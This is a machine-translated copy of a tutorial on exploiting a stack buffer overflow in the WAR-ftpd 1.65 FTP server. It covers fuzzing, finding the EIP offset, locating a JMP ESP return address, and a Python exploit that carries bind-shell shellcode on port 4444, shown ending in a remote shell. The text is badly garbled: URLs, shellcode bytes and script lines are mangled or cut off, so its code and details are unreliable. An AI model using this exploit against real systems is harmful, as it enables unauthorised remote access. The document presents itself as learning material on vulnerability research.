Win32 buffer overflows actual combat (transfer)

Win32 buffer overflows actual combat

-------------------------------------------------- ------------------------------ text: "Intro to Win32 Exploits" author: Sergio Alvarez 2004.09.05 Translator: cloie # PH4NT0M.ORG 2004.10.30 First, the pre-sequence has been invited by a friend to write about the article in Win32 Exploit. One is because there are many * NIX platforms in such articles, while Win32 is relatively small; second is because in Win32 is written in Exploit, some places may be difficult. Here, I will use a specific simple example, detailed analysis of the discovery mining, debugging and Exploit writing utilization, and select a Stack buffer overflow vulnerability of 'WAR-ftpdvl.65'. First, you need to prepare the following practical tools: python - www.python.orgpyopenssl - http://pyopenssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssSL - http://home.t-online.de/ollydbg/ollyuni by fx of pohenoelit - http: //www.phenoelit.dewar-ftpd version 1.65 by jgaa - http://www.jgaa.comfuzzer VL.0 - http://hack3rs.org/~shadown/twister/ (Translator Note) Because Pyopenssl can find Python 2.2.x's Win32 compiling version, so Python installed 2.2.x will be more convenient. Second, the excavation vulnerability can debug in real time in the vulnerability excavation process, you can know what happened. Let's use ollydbg to open the program to debug 'WAR-ftpd VL.65': Run 'ollydbg'? File-> open (or Press F3) (Figure 1)? Browse to the directory where the 'WAR-ftpd VL.65' Then select 'War-ftpd.exe' file (Figure 2)? Debug-> Run (OR PRESS F9)? Run in the WAR-FTP window menu -> 'start service' (Figure 4) After the startup There may be some explainations, and then skip according to the prompt (SHIFT F7 / F8 / F9). Regardless of the OLLYDBG (other debug tool is also the same), the process will be suspended by the debugger, and we need to continue running. Phantom brigade overflow learning materials cloie # www.ph4nt0m.org Figure 1

Figure three

Figure four

OK, now WAR-ftpd has been run, let's use Fuzzer to help us excavate the software vulnerability: c: / fuzzer> Fuzzer.py ############ ################# Net-twister fuzzermodule ## code by sergio 'shadown' alvarez ############################################################################################################################################################################################################################################ ################### usage: c: /fuzzer/fuzzer.py protocols available: SMTP, FTP, POP3 We choose FTP mode for testing: C: / Fuzzer> Fuzzer .py 192.168.178.129 21 FTP See the following display information: <**> it is suppose to recv something, but recv nothing checkit! <**> or as follows: <**> bug all !!!;) <**> -> sending: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Let's look at the status bar at the bottom of Ollydbg, show 'Access Violationwhen executing [41414141] ..' information, the upper right corner of the window display EIP is addressed to 41,414,141, as shown in Figure V five

This means that there is a buffer overflow on the USER command of the FTP authentication section, and the long string covers the EIP. Next, we will keep trying to debug this bug. Since each debug can cause the WAR-FTPD process to die, you can reboot the process through 'debug-> restart'. Third, the debug vulnerability discovers the software vulnerability, we can change the original running process of the program by overwriting the EIP, and jump to run the shellcode we arrange. To achieve this, you must know that two elements, how long the string can be overridden to EIP, and there is what we arrange the shellcode where it is. This is very similar to Linux, of course, we will also see some unique part of Win32. As seen above, now covering the EIP is 41414141, how many long buffers can cover the EIP in memory? I wrote a simple script 'reacheip.py', which can be generated as a digitally arranged buffer, and can modify the number of numbers and lengths by modifying the parameters, so that we can find the buffer length you need to build. The simple principle of the script is as follows, here we first assume that the register size is 1byte: a. First production of the following digital strings 1234567891234567891234567891897B. Then we see that a number covers the EIP (assuming the EIP size is 1byte), assume that it is 2, then we rebuild numbers Strings, only the position where the original number 2 is located, the other position numbers are ignored or unchanged. c. Now a number overrides the EIP, assuming 4 so we can calculate the true length of the buffer for writing Exploit. (Translator Note: Because it simply explains the feature of the script, this author does not mention that this number 4 is the first few in the array. The X86 machine is 4Byte, so we will extend the above digital string. The same arrangement is the same as 4 numbers. In the actual debug, I found that sometimes it is not just the same four numbers covering the EIP, such as 4445, so we add an align character in the beginning of Buffer, such as A. Squeezing the buffer, this to cover the number of EIP The string is 4444. With the build buffer feature of 'Reacheip.py' scripts, you also need to send and receive functions (network sending and reception), which uses' reacheip.py 'as a' library ', re-combining new script' reachwar-ftpd. PY ', used to deal with war-ftpd: Simple explanation of this script parameter: c: / fuzzer> reach_war-fpd.pyusage: c: / fuzzer> Reach_war-ftpd.py

Host: The address port of the target host, the port of the target host, the number of fill data before the number string (1 - 3) Phantom brings overflow learning materials CLOIE # www.ph4nt0m.orgtoreach: Need to be in the new numeric string Replace Digital (1-9) REPEAT: Build a number of digital strings (refers to a number of numbers after modifying the rebuild) Cycles: Sequence Replacement (1-2) FirstReached: Number of the previously replaced (1-9 The following is actually combined with WAR-FTPD: First, the initial digital string is 111122233333 ... Similar, repeated 200 times, total digital strings are 4 * 200 = 800: C: / Fuzzer> Reach_war-ftpd.py 192.168 .178.129 21 0 0 200 1 0220-JGAA's Fan Club FTP Service War-fan Club FTP Service War-ftpd 1.65 Ready 220ples: 800331 User Name Okay, NEED Password. This time looks OLLYDBG, as shown in the following image Information display information 'Access Violation when Executing [36353535] ', the digital string is 36353535, apparent that we need to move the number string in buffer to cover the EIP to make numerous strings 35353535. Hex hexadecimal numbers displayed here, we can get the HEX value corresponding to each letter or digital corresponding from the ASCII table, such as '1' = 31, '2' = 32, '3' = 33, '4' = 34, '5' = 35, ..., '9' = 39, if in the Linux system, you can directly enter the command 'man ascii' to view the corresponding table. Phantom brigade overflow learning materials Cloie # www.ph4nt0m.org Adjusts after tested, this time the digital string is a11112223333 ...: c: / fuzzer> Reach_war-ftpd.py 192.168.178.129 21 1 0 200 1 0220-JGAA's Fan Club FTP Service War-ftpd 1.65 Ready 220ples Enter your user name.buffer size: 801331 user name, need password. This time you look at OLLYDBG, as shown below

Seeing the information display information 'Access Viological When Executing [35353535]', it seems that the number 5 is what we need to replace. The number is irrelevant to use A replacement: c: / fuzzer> Reach_war-ftpd.py 192.168.178.129 21 1 5 20 1 0220-JGAA's Fan Club FTP Service War-ftpd 1.65 Ready 220ples Enter User Name.buffer Size: 737331 User name okay, ned password.check in in in in in in in

At this time, it looks at OLLYDBG, as shown below

Seeing the overlay EIP or 5555, we also need the second time, so that 5555 in the last buffer uses 1111, 2222, 3333, ... sequentially as follows: C: / Fuzzer> Reach_war-ftpd.py 192.168 .178.129 21 1 5 10 2 5220-JGAA's Fan Club FTP Service War-ftpd 1.65 Ready 220ples Enter your user name.buffer size: 3401331 user name okay, need password.check in in lydbg! This time you look at Ollydbg, as shown below

This override EIP is 32323232, that is, 2222, so that we can get the need for Buffer to cover the EIP. First release the 'reachwar-ftpd.py', use 'reacheip.py' to print this time Buffer: c: / fuzzer> Reach_war-ftpd.py 1 5 10 2 5buffer size: ... (below I have nothing to do with it) and copy 2222 to copy (Win2K) The mouse cmd circle, the transport copied into memory, where the need to paste right), used to prepare the following: C: / fuzzer> python -c "printlen ( 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1111AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')" 485 Thus we obtain We want Length 485 knows.

A simpler method is the direct use 'reacheip.py', in fact, the principle is the same, otherwise the same parameters can be modified to obtain: C: / fuzzer> reach_eip.py 1 5 1 2 5Buffer size: 485AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1111AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Now we know the length of the buffer We can initially debug to use this vulnerability. Constructing the shape of 'user' '485 bytes long string' 'a test return, actually, such as' triggerdeadbeef.py' script: c: / fuzzer> Type Trigger_deadbeef.pyimport structprint 'user' '/ x41' * 485 STRUCT.PACK ('phantom brigade overflow learning material Cloie # www.ph4nt0m.org We use NC to send this buffer: c: / fuzzer> Trigger_deadbeef.py | NC 192.168.178.129 21220- JGAA's Fan Club FTP Service War- FTPD 1.65 Ready220 Please Enter User Name.331 User Name Okay, Need Password. Press Ctrl C to stop 'NC' at this time, in OllyDBG as shown below

The display information is 'Access Violation When Executing [Deadbeef]', which seems to cover the EIP. Next, do the second step, look for the position of Shellcode, where Linux is different from Win32. As can be seen from above, the address in the stack is similar to 0x00A4FDD0. It is not appropriate to cover EIP with such address values, because the 0x00 is included, and cannot be used for RET Address. Look carefully in Stack (OllyDBG in the lower right corner window), found that the address of the ESP follows the not far from the EIP, and the 4 BYTES is separated. This is another Roman Avenue in the Win32 (Detailed Principle Analysis See www.nsfocus.net "Classic Articles), put shellcode starts place at this time, in the EIP location coverage with an address of 'JMP ESP' This will be able to perform our shellcode very well. But how do you find the address of 'JMP ESP'? You can search for a value for a particular system on the Internet, there are also some universal addresses. Here is a way to get a plug-in that it is available on its own system, which uses Ollydbg's plug, ie ollyuni.dll copies OLLYUNI.DLL to the ollydbg directory, use the left window to the left window in ollydbg, select 'Overflow return Address-> Ascii Overflow Returns-> Search JMP / Callesp ', as shown below: Search Time will have a little longer, end' view-> log ', see a lot of address values, select one without 0x00. PS, using Lion of Sac.exe to achieve the same effect.

Fourth, vulnerability utilization (ExPloit) A simple utilization script is as follows: c: / fuzzer> type exp_beta.pyimport structsc = "/ x24 / xd9 / x74 / x24 / xf4 / x5b / x31 / xc9 / xb1 / x5e / x81 / x73 / x17 / xe0 / x66 "sc =" / x1c / xc2 / x83 / Xeb / XFC / XE2 / XF4 / X1C / X8E / X4A / XC2 / XE0 / X66 / X4F / X97 / XB6 "SC =" / X31 / X97 / XAE / XC4 / X7E / X97 / X87 / XDC / XED / X48 / XC7 / X98 / X67 / XF6 / X49 / XAA "SC =" / X7E / X97 / X98 / XC0 / X67 / XF7 / X21 / XD2 / X2F / X97 / XF6 / X6B / X67 / XF2 / XF3 / X1F "SC =" / X9A / X2D / X02 / X4C / X5E / XFC / XB6 / XE7 / XA7 / XD3 / XCF / XE1 / XA1 / xf7 / x30 / xdb "sc =" / x1a / x38 / xd6 / x95 / x87 / x97 / x98 / xc4 / x67 / x57 / x49 / xba "sc =" / x7a / X1D / X29 / XC3 / X08 / X8D / X1E / XF3 / X20 / X39 / X42 / X9F / XBB "SC =" / XA4 / X14 / XC2 / XBE / X0C / X2C / X9B / X84 / XED / X05 / X49 / XBB / X6A / X97 / X99 / XFC "SC =" / XED / X07 / X49 / XBB / X6E / X4F / XAA / X6E / X28 / X12 / X2E / X1F / XB0 / X95 / X05 / X61 "SC =" / x8a / x1c / xc3 / x2 / x66 / x4b / x94 / xb3 / XEF / XF9 / X2A / XC7 / X66 / X1C / XC2 / X70 "SC =" / x67 / x1c / XC2 / X56 / X7F / X04 / X25 / X44 / X7F / X6C / X2B / X05 / X2F / X9A / X8B / X44 "SC =" / X7C / X6C / X05 / X44 / XCB / X32 / X2B / X39 / X6F / XE9 / X6F / X2B / X8B / XE0 / XF9 / XB7 "SC =" / X35 / X2E / X9D / XD3 / X54 / X1C / X99 / X6D / X2D / X3C / X93 / X1F / XB1 / X95 / X1D / x69 "sc =" / xa5 / x 91 / XB7 / XF4 / X0C / X1B / X9B / XB1 / X35 / XE3 / XF6 / X6F / X99 / X49 / XC6 / XB9 "SC =" / XEF / X18 / X4C / X02 / X94 / X37 / XE5 / XB4 / X99 / X2B / X3D / XB5 / X56 / X2D / X02 / XB0 "SC =" / x36 / x4c / x92 / xa0 / x36 / x5c / x92 / x1f / x33 / x30 / x4b / x27 / x57 / xc7 / X91 / XB3 "SC =" / X0E / X1E / XC2 / XF1 / X3A / X95 / X22 / X8A / X76 / X4C / X95 / X1F / X33 / X38 / X91 / XB7 "SC =" / X99 / X49 / XeA / XB3 / X32 / X4B / X3D / XB5 / X88 / X25 / X51 / X86 / XE0 "SC =" / XEF / XDC / X4F / X9C / X42 / XB0 / XA8 / XF5 / X3F / XEF / X69 / X67 "SC =

Phantom Brigade Spill Learning Materials Cloie # www.ph4nt0m.org "/ X9C / X9F / X2E / XB4 / X22 / X7A / X05 / XA4 / X42 / X20 / XC3 / XE1" SC = "/ XEF / XEF / X60 / XE6 / XAC / XEF / XEB / XE6 / XE6 / XF0" SC = "/ X32 / X4C / X93 / XB1 / X37 / X5D / X93 / X91 / XB1 / X99 / X69 / XC2 / X88 "SC =" / X14 / XE2 / X71 / XF6 / X99 / X49 / XC6 / X1F / XB6 / X95 / X24 / X1F / X13 / X1C / XAA / X4D "SC =" / XBF / X19 / X0C / X1F / X33 / X18 / X4B / X23 / X0C / XE3 / X3D / XD6 / X99 / XCF / X3D / X95 "SC =" / X66 / X74 / X32 / X6A / X62 / X43 / X3D / XB5 / X62 / X2D / X19 / XB3 / X99 / XCC / XC2 "Print 'USER' '/ X41' * 485 Struct.Pack ('actual utilization It should be noted that 0x750362C3 is the 'JMP ESP' address on the author system. The 'JMP ESP' address obtained by different system platforms is different. Where '/ x41' and '/ x42' Similar NOP, it will add some registers. Value, here does not affect Exploit.sc is shellcode, will bind a shell at 4444 port. Test: c: / fuzzer> exp_beta.py | NC 192.168.178.129 21220- JGAA's Fan Club FTP Service War-ftpd 1.65 ready220 Please enter your user name.331 user name okay, need password. Ctrl C stops NC to see if there is successful overflow: C: / Fuzzer> $ TELNET 192.168.178.129 4444Trying 192.168.178.129 ... conne 192.168. 178.129.scape character is '^]'. Microsoft Windows 2000 [Version 5.00.2195] (C) CopyRight 1985-1999 Microsoft Corp.c: / program files / war-ftpd> OK, test success ^ _ ^. V. First, the translator is first, thank the author, giving us a detailed article, can be said to be an face, the picture is good, no matter how it praises, I think the authors are well deserved. The article discovery from the vulnerability, vulnerability debugging to the vulnerability, explain how to find the Buffer length, how to find the 'JMP ESP' address, how to write Exploit. For beginners, such articles are worth learning.